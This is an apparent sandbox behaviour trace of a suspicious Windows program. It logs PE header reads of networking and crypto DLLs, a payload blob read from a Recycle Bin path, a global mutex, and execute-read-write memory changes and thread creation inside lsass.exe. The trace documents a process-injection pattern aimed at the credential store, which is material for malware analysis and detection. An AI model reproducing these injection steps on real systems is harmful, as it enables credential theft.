Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031394977
System info queried Type: BasicInformation success or wait 2031395802
System info queried Type: ProcessorInformation success or wait 2031396102
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031397886
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031398190
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031398831
System info queried Type: BasicInformation success or wait 2031399125
System info queried Type: ProcessorInformation success or wait 2031399418
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031399834
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031400682
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031400950
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031401347
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031401611
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031401924
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031402534
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031402800
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031403333
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031403675
System info queried Type: BasicInformation success or wait 2031404490
System info queried Type: ProcessorInformation success or wait 2031404789
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031406441
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2031406743
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2031407633
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2031408995
Memory attributes changed PID: 692 Path: C:\WINDOWS\system32\lsass.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2031420853
System info queried Type: BasicInformation success or wait 2031421152
System info queried Type: ProcessorInformation success or wait 2031421456
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031421873
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031422722
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031422992
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031423387
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031423651
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031423964
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031424570
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031424834
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031425365
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031425704
System info queried Type: BasicInformation success or wait 2031426523
System info queried Type: ProcessorInformation success or wait 2031426822
System info queried Type: BasicInformation success or wait 2031429460
System info queried Type: ProcessorInformation success or wait 2031429752
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031430166
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031431008
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031431277
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031431669
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031431935
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031432248
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031432962
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031433232
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031433767
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031434107
System info queried Type: BasicInformation success or wait 2031434960
System info queried Type: ProcessorInformation success or wait 2031435260
System info queried Type: BasicInformation success or wait 2031437990
System info queried Type: ProcessorInformation success or wait 2031438285
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031438702
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031439550
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031439817
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031440215
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031440478
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031440794
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031441405
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031441667
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031442201
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031442545
System info queried Type: BasicInformation success or wait 2031443364
System info queried Type: ProcessorInformation success or wait 2031443663
System info queried Type: BasicInformation success or wait 2031446307
System info queried Type: ProcessorInformation success or wait 2031446601
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031447014
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031447717
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031451308
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031451721
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031451988
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031452304
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031452917
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031453207
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031453834
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031454180
System info queried Type: BasicInformation success or wait 2031455021
System info queried Type: ProcessorInformation success or wait 2031455322
System info queried Type: BasicInformation success or wait 2031457981
System info queried Type: ProcessorInformation success or wait 2031458275
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031458693
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031459556
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031459823
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031460220
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031460485
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031460797
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031461407
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031461673
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031462207
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031462550
System info queried Type: BasicInformation success or wait 2031463369
System info queried Type: ProcessorInformation success or wait 2031463670
System info queried Type: BasicInformation success or wait 2031466314
System info queried Type: ProcessorInformation success or wait 2031466607
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031467020
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031467866
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031468137
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031468533
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031468900
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031469219
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031469830
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031470016
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031470554
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031470897
System info queried Type: BasicInformation success or wait 2031471793
System info queried Type: ProcessorInformation success or wait 2031472094
System info queried Type: BasicInformation success or wait 2031474752
System info queried Type: ProcessorInformation success or wait 2031475046
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031475463
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031476313
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2031476581
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031476979
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2031477243
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2031477558
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031478170
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2031478434
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2031478968
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2031479313
System info queried Type: BasicInformation success or wait 2031480135
System info queried Type: ProcessorInformation success or wait 2031480436
System info queried Type: BasicInformation success or wait 2031483123
System info queried Type: ProcessorInformation success or wait 2031483417
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031483827
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031484676
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2031484945
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031485653
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031485921
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2031486238
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031486850
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2031487116
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031487650
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2031487997
System info queried Type: BasicInformation success or wait 2031488817
System info queried Type: ProcessorInformation success or wait 2031489152
System info queried Type: BasicInformation success or wait 2031491159
System info queried Type: ProcessorInformation success or wait 2031491455
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031491868
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031492727
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2031492997
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031493702
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031493971
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2031494286
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031494901
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2031495169
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031495705
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2031496050
System info queried Type: BasicInformation success or wait 2031496876
System info queried Type: ProcessorInformation success or wait 2031497179
System info queried Type: BasicInformation success or wait 2031499762
System info queried Type: ProcessorInformation success or wait 2031500057
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031500469
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031501324
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2031501594
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031502299
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031502645
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2031503074
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031504225
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2031504710
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031505475
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: F60000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2031505639
System info queried Type: BasicInformation success or wait 2031506475
System info queried Type: ProcessorInformation success or wait 2031506778
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2031508920
Thread created PID: 692 TID: 484 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031510483
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2031527945
Thread delayed Time: 0 TID: 9768 success or wait 2033442484
Thread delayed Time: 0 TID: 9768 success or wait 2033459386
Thread delayed Time: 0 TID: 9768 success or wait 2033512455
Thread delayed Time: 0 TID: 9768 success or wait 2035755047
Thread delayed Time: 0 TID: 9768 success or wait 2035755731
Thread delayed Time: 0 TID: 9768 success or wait 2035756156
Thread delayed Time: 0 TID: 9768 success or wait 2036874334
Thread delayed Time: 0 TID: 9768 success or wait 2036875155
Thread delayed Time: 0 TID: 9768 success or wait 2036875651
Thread delayed Time: 0 TID: 9768 success or wait 2038031493
Thread delayed Time: 0 TID: 9768 success or wait 2038033330
Thread delayed Time: 0 TID: 9768 success or wait 2038034733
Thread delayed Time: 0 TID: 9768 success or wait 2041020352
Thread delayed Time: 0 TID: 9768 success or wait 2041022467
Thread delayed Time: 0 TID: 9768 success or wait 2041024289
Thread delayed Time: 0 TID: 9768 success or wait 2042279590
Thread delayed Time: 0 TID: 9768 success or wait 2042280771
Thread delayed Time: 0 TID: 9768 success or wait 2042303171
Thread delayed Time: 0 TID: 9768 success or wait 2046819654
Thread delayed Time: 0 TID: 9768 success or wait 2046820844
Thread delayed Time: 0 TID: 9768 success or wait 2046821543
Thread delayed Time: 0 TID: 9768 success or wait 2048439600
Thread delayed Time: 0 TID: 9768 success or wait 2048440796
Thread delayed Time: 0 TID: 9768 success or wait 2048442004
Thread delayed Time: 0 TID: 9768 success or wait 2049929980
Thread delayed Time: 0 TID: 9768 success or wait 2049930788
Thread delayed Time: 0 TID: 9768 success or wait 2049931485
Thread delayed Time: 0 TID: 9768 success or wait 2051535529
Thread delayed Time: 0 TID: 9768 success or wait 2051538130
Thread delayed Time: 0 TID: 9768 success or wait 2051539740
Thread delayed Time: 0 TID: 9768 success or wait 2052646094
